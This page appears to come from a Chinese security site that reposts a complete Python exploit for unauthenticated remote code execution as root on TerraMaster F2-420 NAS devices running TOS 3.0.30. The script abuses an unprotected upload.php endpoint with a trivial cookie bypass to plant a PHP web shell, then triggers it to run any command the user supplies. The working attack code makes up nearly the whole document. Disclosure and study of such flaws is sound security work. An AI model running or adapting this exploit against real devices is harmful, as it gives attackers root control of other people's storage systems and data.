首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Roo
来源:evilsocket@protonmail.com 作者:Margaritelli 发布时间:2017-05-31  
# Source: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/
 
#!/usr/bin/python
# coding: utf8
#
# Exploit: Unauthenticated RCE as root.
# Vendor: TerraMaster
# Product: TOS <= 3.0.30 (running on every NAS)
# Author: Simone 'evilsocket' Margaritelli <evilsocket@protonmail.com>
import sys
import requests
def upload( address, port, filename, path = '/usr/www/' ):
    url = "http://%s:%d/include/upload.php?targetDir=%s" % ( address, port, path )
    try:
        files = { 'file': open( filename, 'rb' ) }
        cookies = { 'kod_name': '1' } # LOL :D
        r = requests.post(url, files=files, cookies=cookies)
        if r.text != '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}':
            print "! Unexpected response, exploit might not work:\n%s\n" % r.text
        return True
    except Exception as e:
        print "\n! ERROR: %s" % e
    return False
def rce( address, port, command ):
    with open( '/tmp/p.php', 'w+t' ) as fp:
        fp.write( "<?php system('%s'); ?>" % command )
    if upload( address, port, '/tmp/p.php' ) == True:
        try:
            url = "http://%s:%d/p.php" % ( address, port )
            return requests.get(url).text
        except Exception as e:
            print "\n! ERROR: %s" % e
    return None
if len(sys.argv) < 3:
    print "Usage: exploit.py <ip|hostname> <command> (port=8181)\n"
    quit()
target  = sys.argv[1]
command = sys.argv[2]
port    = 8181 if len(sys.argv) < 4 else int(sys.argv[3])
out = rce( target, port, command )
if out is not None:
    print out.strip()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KEMP LoadMaster 7.135.0.13245
·IBM Informix Dynamic Server /
·Microsoft MsMpEng - Remotely E
·ModX CMS Proof Of Concept Shel
·TiEmu 2.08 - Local Buffer Over
·WebKit Document::prepareForDes
·uc-http Daemon - Local File In
·WebKit JSC JSObject::ensureLen
·Octopus Deploy - Authenticated
·WebKit JSC emitPutDerivedConst
·CERIO DT-100G-N/DT-300N/CW-300
·WebKit CachedFrame Universal C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved